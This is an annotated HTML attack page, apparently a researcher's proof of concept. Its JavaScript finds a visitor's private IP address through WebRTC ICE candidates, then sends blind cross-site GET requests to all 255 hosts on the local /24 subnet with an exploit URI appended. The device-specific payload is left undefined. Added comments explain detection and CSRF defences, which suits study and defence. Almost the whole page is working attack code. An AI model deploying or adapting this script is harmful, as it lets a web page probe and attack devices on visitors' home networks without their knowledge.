
<script>
// Linkback: https://www.tripwire.com/state-of-security/off-topic/smart-csrf/
// This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
// I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
// A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
// DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
// Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
// -- Craig Young, Security Researcher Tripwire VERT
//get the IP addresses associated with this machine
/**
 * Enumerate the IPv4 addresses the browser reveals through WebRTC ICE
 * candidates and invoke `callback(ip)` once for each distinct address.
 *
 * Defender's note: no camera/microphone permission is involved; creating a
 * data channel and an offer is enough to make the browser gather candidates.
 * Because the function also falls back to an iframe's window object, a
 * WebRTC blocker that only patches the top-level window does not cover this.
 *
 * @param {(ip: string) => void} callback - called once per newly seen IPv4 address
 */
function getIPs(callback){
//addresses already reported, keyed by IP, so each is passed to callback once
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
//`iframe` is not declared anywhere here; it relies on the browser exposing
//the element with id="iframe" as a global property of window
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome
if(useWebKit)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//pull the first dotted-quad out of one candidate string and report it if unseen
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
//NOTE(review): exec() returns null for a candidate with no dotted-quad
//(IPv6, or the mDNS hostnames current browsers substitute for host
//candidates), and the [1] access then throws inside the event handler;
//the author's browsers evidently produced IPv4 host candidates only
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp (legacy callback form; the error callbacks below are
//no-ops, so any failure to gather candidates is silent)
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done: a second pass over the SDP catches
//candidates that were gathered but not delivered via onicecandidate; ip_dups
//prevents re-reporting ones already seen
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
//Callback for getIPs: when a reported address sits in one of the private
//ranges matched below, assume a /24 and send one GET to every host in it with
//`exploit_URI_payload` appended. `exploit_URI_payload` is not defined anywhere
//on this page; the product-specific payload was withheld by the author.
//
//Defender's note: this is the blind cross-site request step. The responses are
//never read, so same-origin policy and CORS do not stop the requests from
//being sent; the device endpoint has to require something the browser will
//not attach on its own (a CSRF token, a non-cookie credential) or reject
//cross-site requests outright. On the network, a page load followed by ~255
//sequential GETs from one client to consecutive LAN addresses is the signal
//to look for.
getIPs(
function(ip){
//captures the leading octets of the matched range; note the 172.16. alternative
//captures only two octets, so the URL built below is a complete address only
//for the 10.x.x and 192.168.x cases
var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
if (local_regex.exec(ip) != null) {
var subnet = local_regex.exec(ip)[0];
//`node` is never declared, so it becomes an implicit global in this non-strict script
for (node=1; node<256; node++) {
var url = 'http://' + subnet + node + exploit_URI_payload;
//async GET with the response ignored
var oReq = new XMLHttpRequest();
oReq.open("get",url,true)
oReq.send();
}
}
}
);
</script>
<H1>o0o0o0o0o0o0</H1>
</HTML>